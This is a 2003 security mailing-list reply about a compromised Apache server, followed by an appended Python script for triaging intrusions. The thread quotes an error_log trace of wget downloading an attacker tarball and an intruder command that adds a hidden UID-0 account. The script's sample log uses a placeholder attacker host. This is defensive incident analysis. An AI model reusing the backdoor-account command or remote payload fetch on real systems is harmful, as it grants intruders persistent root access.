Mailinglist Archive: opensuse-security (334 mails)

Re: [suse-security] Re: Apache Gain Remote Shell Access
  • From: Marco Lum <marco@xxxxxxxxxxxxx>
  • Date: Thu, 04 Sep 2003 02:35:42 +0800
  • Message-id: <3F56347E.3010604@xxxxxxxxxxxxx>
Checked, no root access gained.
No CGI access - no log in access_log.
No shell access by wwwrun.
Not infected by Linux.RST.B (scanned all bin/sbin/user/bin, also checked by
hand, no unknown outgoing connection).
Played back his history; root access cannot be done.
All tasks stop when I stop apache.
BTW, what the hell is "raver"?

Stefan Andreas Tichy wrote:

> On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
>
>>Follows found in error_log of apache
>>
>>--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
>> => `vulturu.tgz'
>>Resolving www.vulturul.org... done.
>>Connecting to www.vulturul.org[195.110.124.188]:80... connected.
>>HTTP request sent, awaiting response... 200 OK
>>Length: 9,432 [application/x-tar]
>>
>> 0K ......... 100%
>>13.69 KB/s
>>
>>09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
>
> Wget output in apache error_log. Check for a CGI (shell script?)
> allowing clients to execute arbitrary commands.
>
>>Also Found his command history:
>>
>> id
>>/usr/sbin/adduser vulturul -u0 -g0 -M;
>
> He has root access but is not sure about that?
>
> At least two problems. Execution of commands as user wwwrun and
> local root compromise.
>
> I hope the box has been disconnected from the network already.
>

--
Marco Lum
Net Service Manager

___________________________________________________________________________________________
System Development Service
Inter/Intra/Local-Area Networking Service

VOICE: +852 2851 1190
FAX : +852 2851 1109
Email: enquiry@xxxxxxxxxxxxx
WWWeb: http://www.hkservice.com

HK Service Company
HK Service Consultants Limited
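The two indicators the thread turns on are a wget download trace written into Apache's error_log (a CGI running commands as wwwrun) and a passwd entry created with `adduser -u0 -g0` (a second UID-0 account). The following triage script is an added example, not code from either poster; the log and passwd samples in it are constructed to mirror the quoted output, and the hostname `attacker.example` is a placeholder.

```python
"""Triage helpers for the indicators discussed in the thread:
wget banners in Apache's error_log and extra UID-0 accounts in passwd.
All sample input below is constructed for this example."""
import re

# wget banner: "--09:41:10-- http://host/file" ... "`file' saved [N/N]"
WGET_START = re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(\S+)$")
WGET_SAVED = re.compile(r"^\d{2}:\d{2}:\d{2} .* - `(.+)' saved \[(\d+)/(\d+)\]$")

def find_wget_downloads(error_log: str) -> list:
    """One record per completed wget download found in error_log text."""
    hits, pending_url = [], None
    for line in error_log.splitlines():
        line = line.strip()
        start = WGET_START.match(line)
        if start:
            pending_url = start.group(1)      # remember the fetched URL
            continue
        saved = WGET_SAVED.match(line)
        if saved and pending_url:
            hits.append({"url": pending_url, "file": saved.group(1),
                         "bytes": int(saved.group(3))})
            pending_url = None
    return hits

def uid0_accounts(passwd: str) -> list:
    """Names of every UID-0 account other than root (e.g. adduser -u0 -g0)."""
    names = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names

# Constructed samples modelled on the quoted log; not real data.
SAMPLE_ERROR_LOG = """\
[Thu Sep 04 09:41:09 2003] [error] [client 10.0.0.5] script not found
--09:41:10-- http://attacker.example/vulturu.tgz
           => `vulturu.tgz'
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
vulturul:x:0:0::/home/vulturul:/bin/bash
"""

if __name__ == "__main__":
    print("downloads via CGI:", find_wget_downloads(SAMPLE_ERROR_LOG))
    print("extra UID-0 accounts:", uid0_accounts(SAMPLE_PASSWD))
```

Run it against the real `/var/log/apache/error_log` and `/etc/passwd` contents instead of the samples; a non-empty result from either function is the "at least two problems" Stefan describes.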
